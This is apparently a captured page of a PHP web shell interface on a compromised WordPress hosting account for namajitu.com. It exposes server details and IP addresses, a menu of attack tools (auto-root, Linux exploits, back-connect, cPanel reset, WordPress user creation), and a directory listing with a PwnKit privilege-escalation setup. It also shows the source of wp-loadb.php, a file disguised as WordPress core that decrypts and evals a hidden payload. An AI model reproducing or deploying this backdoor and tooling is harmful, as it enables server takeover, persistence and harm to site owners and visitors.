Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
namajitu.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known__736f5f6
[ DIR ]
drwxr--r--
874109
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
JTGJ__736f5f6
[ DIR ]
drwxr--r--
JTGK__736f5f6
[ DIR ]
drwxr--r--
JTGL__736f5f6
[ DIR ]
drwxr--r--
JTGM__736f5f6
[ DIR ]
drwxr--r--
JTGN__736f5f6
[ DIR ]
drwxr--r--
JTGO__736f5f6
[ DIR ]
drwxr--r--
cdn.ampproject.org__736f5f6
[ DIR ]
drwxr--r--
images__736f5f6
[ DIR ]
drwxr--r--
video__736f5f6
[ DIR ]
drwxr--r--
wp-includes__736f5f6
[ DIR ]
drwxr--r--
.hta
6.57
KB
-rw-r--r--
.htaccess
233
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
engine.php
27.2
KB
-rw-r--r--
error_log
9.47
MB
-rw-r--r--
index.php
405
B
-r--r--r--
namajitu.com.php
6.79
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
64
B
-rw-r--r--
wp-blog-header.php
633
B
-r--r--r--
wp-load.php
3.95
KB
-rw-r--r--
wp-loada.php
2.32
KB
-rw-r--r--
wp-loadb.php
2.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-loadb.php
<?php class Secure{ private $masterKey; private $iterations = 10000; private $cipher = 'aes-256-cbc'; private $hmacAlgo = 'sha256'; private $saltLength = 16; public function __construct($masterKey) { $this->masterKey = $masterKey; } public function Soyt($en) { $data = base64_decode($en); $salt = substr($data, 0, $this->saltLength); $ivLength = openssl_cipher_iv_length($this->cipher); $iv = substr($data, $this->saltLength, $ivLength); $hmac = substr($data, $this->saltLength + $ivLength, $this->hmacLength()); $ciphertext = substr($data, $this->saltLength + $ivLength + $this->hmacLength()); $derivedKeys = $this->deriveKeys($salt); $calcHmac = hash_hmac( $this->hmacAlgo, $iv . $salt . $ciphertext, $derivedKeys['hmac'], true ); if (!$this->verifyHmac($calcHmac, $hmac)) { return false; } return openssl_decrypt( $ciphertext, $this->cipher, $derivedKeys['encryption'], OPENSSL_RAW_DATA, $iv ); } private function deriveKeys($salt) { $keyMaterial = hash_pbkdf2( $this->hmacAlgo, $this->masterKey, $salt, $this->iterations, 64, true ); return [ 'encryption' => substr($keyMaterial, 0, 32), 'hmac' => substr($keyMaterial, 32) ]; } private function verifyHmac($knownHmac, $userHmac) { return hash_equals($knownHmac, $userHmac); } private function hmacLength() { return strlen(hash($this->hmacAlgo, '', true)); } public function setIterations($iterations) { $this->iterations = (int)$iterations; return $this; } public function setCipher($cipher) { if (!in_array($cipher, openssl_get_cipher_methods())) { throw new RuntimeException('found'); } $this->cipher = $cipher; return $this; } } eval($a);
Close